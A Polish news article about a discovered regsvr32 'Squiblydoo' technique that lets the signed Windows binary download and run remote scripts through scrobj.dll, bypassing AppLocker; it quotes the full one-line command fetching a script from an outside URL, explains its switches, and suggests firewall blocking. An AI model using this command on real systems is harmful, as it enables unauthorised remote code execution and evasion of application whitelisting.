r   e   k   l   a   m   a
r   e   k   l   a   m   a

Regsvr32 uruchamia skrypty z Sieci. Jedną komendą złamiesz Windowsa

Strona główna AktualnościBEZPIECZEŃSTWO

Być może to nie błąd, lecz po prostu niezamierzona funkcjonalność Windowsa. Na pewno jednak odkryte przez Caseya Smitha działanie systemowego narzędzia Regsvr32, przeznaczonego do rejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowanie zarówno wśród cyberprzestępców, jak i np. uczniów w szkołach. Któż się spodziewał, że pozwoli ono całkowicie obejść systemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?

AppLocker wykorzystywany jest już od czasów wprowadzenia na rynek Windowsa 7 do blokowania użytkownikom dostępu do niepożądanych skryptów i aplikacji – i do tej pory był skutecznym sposobem na zamknięcie „okienek”. Okazuje się jednak, że Regsvr32 (Microsoft Register Server), będący podpisaną przez Microsoft binarką, domyślnie obecną w systemie, pozwala na pobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lub VBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolną aplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

r   e   k   l   a   m   a

W przykładzie podanym przez The Register, który jako pierwszy poinformował o tej ciekawej możliwości, regsvr32 wywoływany jest z czterema przełącznikami. /s wycisza komunikaty, /n nakazuje nie korzystać z komponentu DllRegisterServer, /i przekazuje opcjonalny parametr do funkcji DllInstall (tutaj skrypt, który nakazuje uruchomić konsolę CMD.exe) , zaś /u oznacza próbę odrejestrowania obiektu. Widoczna w wywołaniu biblioteka scrobj.dll to Microsoft Script Component Runtime.

Jeśli więc regsvr32 dostanie URL, pod którym znajdować się będzie plik XML z uruchamialnym kodem, to pobierze go po HTTP lub HTTPS i uruchomi, poprzez próbę odrejestrowania pliku DLL. Nie trzeba tu żadnych specjalnych uprawnień, okna są szeroko otwarte dla każdego.

Odkrywca tej „funkcjonalności”, która daje zupełnie nowe możliwości w dziedzinie penetrowania Windowsów, przygotował już cały zbiór skryptów, które można w ten sposób uruchomić. Możecie je znaleźć na GitHubie – pomogą sprawdzić, na ile Wasze systemy są na to podatne.

Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca się odkryciem. To w końcu wbudowane w system zdalne uruchamianie kodu bez uprawnień administratora, które omija mechanizm białych list, nie pozostawia śladów na dysku, nie dotyka Rejestru i można to wszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tej pory łatek nie ma. Jedyne co pozostaje administratorom, to zablokować dostęp do Sieci dla regsvr32 na poziomie zapory sieciowej.

© dobreprogramy
r   e   k   l   a   m   a
r   e   k   l   a   m   a

Komentarze

r   e   k   l   a   m   a
r   e   k   l   a   m   a
Czy wiesz, że używamy cookies (ciasteczek)? Dowiedz się więcej o celu ich używania i zmianach ustawień.
Korzystając ze strony i asystenta pobierania wyrażasz zgodę na używanie cookies, zgodnie z aktualnymi ustawieniami przeglądarki.